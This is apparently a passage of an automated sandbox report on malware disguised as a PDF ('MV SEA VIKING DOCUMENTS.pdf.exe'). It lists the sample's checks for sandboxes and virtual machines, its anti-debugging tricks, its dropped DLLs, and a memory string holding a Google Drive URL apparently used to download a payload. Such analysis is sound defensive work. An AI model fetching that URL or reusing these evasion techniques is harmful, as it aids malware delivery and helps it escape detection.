      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766928660.0000000003380000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820326637.00000000032F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1_L7ZIPGVNC4_SHW57WLJYSN0GUBSQWED
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2304662586.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4676991743.0000000002B70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2304662586.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766928660.0000000003380000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4676991743.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820326637.00000000032F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe TID: 5816Thread sleep count: 576 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5532Thread sleep time: -250000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exe TID: 8760Thread sleep count: 117 > 30
      Source: C:\Windows\SysWOW64\chkdsk.exe TID: 8760Thread sleep time: -234000s >= -30000s
      Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeWindow / User API: threadDelayed 576Jump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeAPI coverage: 1.3 %
      Source: C:\Windows\SysWOW64\chkdsk.exeAPI coverage: 2.6 %
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeAPI coverage: 1.3 %
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cliconfg.dllJump to dropped file
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\provmigrate.dllJump to dropped file
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\raschapext.dllJump to dropped file
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_024506CE rdtsc 0_2_024506CE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-8197
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-8353
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeAPI call chain: ExitProcess graph end nodegraph_30-3381
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeAPI call chain: ExitProcess graph end nodegraph_30-3377
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeAPI call chain: ExitProcess graph end nodegraph_34-3460
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2305005279.0000000004749000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2767074941.0000000003449000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4677428017.0000000004729000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2304662586.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4676991743.0000000002B70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2305005279.0000000004749000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2767074941.0000000003449000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4677428017.0000000004729000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2305005279.0000000004749000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2767074941.0000000003449000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4677428017.0000000004729000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2305005279.0000000004749000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2767074941.0000000003449000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4677428017.0000000004729000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766928660.0000000003380000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820326637.00000000032F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1_L7ZipgVNc4_sHw57wljySn0gUbSqwED
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2305005279.0000000004749000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2767074941.0000000003449000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4677428017.0000000004729000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2435436962.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2726590040.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2760502494.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766050247.0000000001A88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2530505129.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2475947492.000000000F792000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2722780780.000000000F792000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2530041427.000000000F792000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2476388852.000000000F7E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2723471084.000000000F7E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: shmhprg0nvltzt.exe, 00000023.00000002.4818912953.00000000019E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp!
      Source: shmhprg0nvltzt.exe, 00000023.00000003.4810603799.0000000001A8E000.00000004.00000020.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4819883772.0000000001A8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2304662586.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2766928660.0000000003380000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4676991743.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820326637.00000000032F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000010.00000000.2474170391.000000000F5F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2588169195.000000000F5F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2720572878.000000000F5F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.2527930147.000000000F5F6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWiles\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dllcqs
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2305005279.0000000004749000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2767074941.0000000003449000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4677428017.0000000004729000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2305005279.0000000004749000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2767074941.0000000003449000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4677428017.0000000004729000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2765294903.0000000001A53000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2725523941.0000000001A53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, 00000000.00000002.2305005279.0000000004749000.00000004.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2767074941.0000000003449000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 0000001E.00000002.4677428017.0000000004729000.00000004.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: shmhprg0nvltzt.exe, 00000023.00000002.4820515806.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: firefox.exe, 00000021.00000002.4638084914.00000244A23C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0087FA90 FindFirstFileW,FindNextFileW,FindClose,21_2_0087FA90
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0087FA89 FindFirstFileW,FindNextFileW,FindClose,21_2_0087FA89
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 30_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,30_2_00405C49
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 30_2_00406873 FindFirstFileW,FindClose,30_2_00406873
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 30_2_0040290B FindFirstFileW,30_2_0040290B
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 34_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,34_2_00405C49
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 34_2_00406873 FindFirstFileW,FindClose,34_2_00406873
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 34_2_0040290B FindFirstFileW,34_2_0040290B
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeSystem information queried: ModuleInformationJump to behavior

      Anti Debugging

      barindex
      Hides threads from debuggers
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeThread information set: HideFromDebugger
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_71491BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_71491BFF
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245FC11 mov eax, dword ptr fs:[00000030h]0_2_0245FC11
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_02458BDC mov eax, dword ptr fs:[00000030h]0_2_02458BDC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245DB94 mov eax, dword ptr fs:[00000030h]0_2_0245DB94
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245787B mov eax, dword ptr fs:[00000030h]0_2_0245787B
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245E40E mov eax, dword ptr fs:[00000030h]0_2_0245E40E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245F89B mov eax, dword ptr fs:[00000030h]0_2_0245F89B
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245754E mov eax, dword ptr fs:[00000030h]0_2_0245754E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0245754E mov eax, dword ptr fs:[00000030h]0_2_0245754E
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F258F3C mov eax, dword ptr fs:[00000030h]13_2_1F258F3C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F258F3C mov eax, dword ptr fs:[00000030h]13_2_1F258F3C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F258F3C mov ecx, dword ptr fs:[00000030h]13_2_1F258F3C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F258F3C mov ecx, dword ptr fs:[00000030h]13_2_1F258F3C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1ECF00 mov eax, dword ptr fs:[00000030h]13_2_1F1ECF00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1ECF00 mov eax, dword ptr fs:[00000030h]13_2_1F1ECF00
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FF03 mov eax, dword ptr fs:[00000030h]13_2_1F24FF03
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FF03 mov eax, dword ptr fs:[00000030h]13_2_1F24FF03
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F24FF03 mov eax, dword ptr fs:[00000030h]13_2_1F24FF03
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EDF36 mov eax, dword ptr fs:[00000030h]13_2_1F1EDF36
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EDF36 mov eax, dword ptr fs:[00000030h]13_2_1F1EDF36
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EDF36 mov eax, dword ptr fs:[00000030h]13_2_1F1EDF36
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1EDF36 mov eax, dword ptr fs:[00000030h]13_2_1F1EDF36
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CFF30 mov edi, dword ptr fs:[00000030h]13_2_1F1CFF30
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BF0C mov eax, dword ptr fs:[00000030h]13_2_1F20BF0C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BF0C mov eax, dword ptr fs:[00000030h]13_2_1F20BF0C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F20BF0C mov eax, dword ptr fs:[00000030h]13_2_1F20BF0C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4F1D mov eax, dword ptr fs:[00000030h]13_2_1F2A4F1D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F210F16 mov eax, dword ptr fs:[00000030h]13_2_1F210F16
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F210F16 mov eax, dword ptr fs:[00000030h]13_2_1F210F16
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F210F16 mov eax, dword ptr fs:[00000030h]13_2_1F210F16
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F210F16 mov eax, dword ptr fs:[00000030h]13_2_1F210F16
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28EF66 mov eax, dword ptr fs:[00000030h]13_2_1F28EF66
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F226F70 mov eax, dword ptr fs:[00000030h]13_2_1F226F70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F2A4F7C mov eax, dword ptr fs:[00000030h]13_2_1F2A4F7C
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28BF4D mov eax, dword ptr fs:[00000030h]13_2_1F28BF4D
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CEF79 mov eax, dword ptr fs:[00000030h]13_2_1F1CEF79
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CEF79 mov eax, dword ptr fs:[00000030h]13_2_1F1CEF79
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CEF79 mov eax, dword ptr fs:[00000030h]13_2_1F1CEF79
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1CBF70 mov eax, dword ptr fs:[00000030h]13_2_1F1CBF70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D1F70 mov eax, dword ptr fs:[00000030h]13_2_1F1D1F70
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FAF72 mov eax, dword ptr fs:[00000030h]13_2_1F1FAF72
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F28AF50 mov ecx, dword ptr fs:[00000030h]13_2_1F28AF50
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1FBF93 mov eax, dword ptr fs:[00000030h]13_2_1F1FBF93
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov ecx, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1E0F90 mov eax, dword ptr fs:[00000030h]13_2_1F1E0F90
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F208FBC mov eax, dword ptr fs:[00000030h]13_2_1F208FBC
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 13_2_1F1D4FB6 mov eax, dword ptr fs:[00000030h]13_2_1F1D4FB6
